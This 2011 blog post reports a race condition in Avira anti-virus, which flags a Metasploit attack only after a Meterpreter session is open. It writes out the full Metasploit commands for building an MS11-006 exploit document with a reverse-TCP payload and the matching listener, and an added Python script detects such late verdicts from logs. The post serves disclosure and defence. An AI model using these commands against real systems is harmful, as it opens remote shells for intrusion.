Thursday, March 17, 2011

Metasploit Meterpreter race condition against Avira anti-virus

This video demonstrates a race condition against Avira anti-virus products. The race condition is due to design errors in the Avira anti-virus products themselves.


We will exploit the MS11-006 vulnerability (Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow) and use a reverse TCP meterpreter payload.


As you will see, the installed “Avira AntiVir Personal” anti-virus does detect the attack, but too late: the Meterpreter session is already created and you have access to the system.


The demonstrated product is an up-to-date “Avira AntiVir Personal”, but this race condition also appears in other Avira products, such as “Avira AntiVir Premium” and “Avira Premium Security Suite”.
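As an added illustration from the defender's side (not part of the original post), the following script flags the "detected, but too late" pattern described above: it pairs each anti-virus verdict with any outbound connection the same host had already opened shortly before, and reports the lag. The log formats, hostnames and sample lines are constructed for this example and are not Avira's or Metasploit's real output.

```python
"""Flag AV detections logged only after an outbound connection from the same
host was already up: the "detected, but too late" race described in the post.
Log formats and sample lines are constructed for this example; they are not
Avira's or Metasploit's real log formats."""
from __future__ import annotations
from datetime import datetime

# Constructed sample telemetry (raw strings so the Windows paths keep their backslashes).
CONN_LOG = r"""
2011-03-17 10:42:03 host=ws01 proc=WINWORD.EXE dst=192.168.178.21:4444
2011-03-17 10:50:00 host=ws02 proc=chrome.exe dst=93.184.216.34:443
2011-03-17 09:00:00 host=ws03 proc=outlook.exe dst=93.184.216.34:443
"""
AV_LOG = r"""
2011-03-17 10:42:09 host=ws01 file=C:\Users\bob\msf.doc verdict=malware
2011-03-17 10:49:30 host=ws02 file=C:\tmp\sample.exe verdict=malware
2011-03-17 10:55:00 host=ws03 file=C:\tmp\other.doc verdict=malware
"""

def parse(log: str) -> list[dict]:
    """Parse 'YYYY-MM-DD HH:MM:SS key=value ...' lines into dicts with a 'ts' datetime."""
    events = []
    for line in log.splitlines():
        if not line.strip():
            continue
        date, time, *fields = line.split()
        ev = dict(f.split("=", 1) for f in fields)
        ev["ts"] = datetime.fromisoformat(f"{date} {time}")
        events.append(ev)
    return events

def late_detections(conn_log: str, av_log: str, window_s: int = 60) -> list[dict]:
    """For every AV verdict, report the earliest outbound connection from the same
    host in the window_s seconds BEFORE the verdict.  A hit means the payload was
    already talking to its handler when the scanner finally reacted."""
    conns = parse(conn_log)
    hits = []
    for det in parse(av_log):
        earlier = [c for c in conns if c["host"] == det["host"]
                   and 0 <= (det["ts"] - c["ts"]).total_seconds() <= window_s]
        if earlier:
            first = min(earlier, key=lambda c: c["ts"])
            hits.append({"host": det["host"], "file": det["file"],
                         "proc": first["proc"], "dst": first["dst"],
                         "lag_seconds": (det["ts"] - first["ts"]).total_seconds()})
    return hits

if __name__ == "__main__":
    for h in late_detections(CONN_LOG, AV_LOG):
        print(f"{h['host']}: {h['file']} flagged {h['lag_seconds']:.0f}s after "
              f"{h['proc']} connected to {h['dst']}")
```

With the constructed data only ws01 is reported (the verdict came 6 seconds after WINWORD.EXE connected out); ws02's connection happened after its verdict and ws03's falls outside the window.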


Metasploit commands:


To create the msf.doc file that exploits the MS11-006 vulnerability:


use exploit/windows/fileformat/ms11_006_createsizeddibsection
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit


To listen for incoming Meterpreter sessions:


use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
set InitialAutoRunScript migrate -f
exploit -j


Demonstration video: